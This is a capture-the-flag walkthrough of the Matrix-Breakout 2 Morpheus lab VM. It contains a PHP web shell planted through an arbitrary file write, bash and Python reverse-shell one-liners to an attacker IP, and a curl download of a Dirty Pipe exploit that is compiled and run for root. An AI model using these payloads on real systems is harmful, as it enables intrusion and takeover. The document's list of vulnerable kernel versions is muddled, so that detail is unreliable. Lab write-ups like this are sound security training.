Exploiting Arbitrary File Write and Dirty Pipe in Matrix-Breakout 2 Morpheus
Deploy the target OVA in VirtualBox and configure the attacker environment using Kali Linux on the same internal network segment. After booting, identify the target's assigned IP through network scanning:
arp-scan -l
Once the target is identified (e.g., 10.0.2.15), perform aggressive service enumeration:
nmap -sC -sV -p- -T4 10.0.2.15
The scan reveals HTTP services on standard ports. Manual inspection of the web root shows minimal functionality. Proceed with directory brute-forcing to uncover hidden endpoints:
gobuster dir -u http://10.0.2.15 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak,zip
This discovers robots.txt, wall.php, and messages.txt. The wall.php endpoint implements a graffiti-style message board that writes user input to a text file. Intercept the submission request with a proxy to analyze parameters. The request contains a target_file parameter specifying the output location. This allows writing arbitrary content to any file path accessible by the web server process.
Craft a request to deploy a PHP web shell:
POST /wall.php HTTP/1.1
Host: 10.0.2.15
Content-Type: application/x-www-form-urlencoded
input_data=<?php echo shell_exec($_REQUEST['c']); ?>&target_file=cmd.php
Verify execution by acessing http://10.0.2.15/cmd.php?c=whoami. To establish an interactive session, set up a listener on the attacker machine:
nc -lvnp 9999
Inject a reverse shell payload through the deployed web shell. Encode the following payload for URL transmission:
/bin/bash -i >& /dev/tcp/10.0.2.10/9999 0>&1
Or utilize a Python alternative:
python3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('10.0.2.10',9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"
Once the reverse connection is established, stabilize the shell and enumerate the file system. In the web directory, locate a hidden PNG file (e.g., .neo-secret.png). Download the image for local analysis:
wget http://10.0.2.15/.neo-secret.png
Analyze for steganography or embedded archives:
binwalk -e .neo-secret.png
Extracted data reveals compressed content containing credential hints or intermediate flags. Continue enumeration to identify priviledge escalation vectors. Check kernel version information:
uname -a
Vulnerable kernels (Linux 5.8 through 5.16.11, 5.15.25, or 5.10.102) are susceptible to the Dirty Pipe vulnerability (CVE-2022-0847). Transfer the exploit to the target:
# Attacker host
python3 -m http.server 8888
# Target shell
curl http://10.0.2.10:8888/pipe-exploit.c -o /tmp/exp.c
gcc /tmp/exp.c -o /tmp/pwn -static
chmod +x /tmp/pwn
/tmp/pwn
Alternatively, if using a precompiled exploit script:
chmod +x privesc.sh
./privesc.sh
The exploit leverages the pipe page splicing vulnerability to overwrite read-only files or inject code into SUID binaries. Successful execution yields root privileges. Retrieve the final flag:
cat /root/root.txt
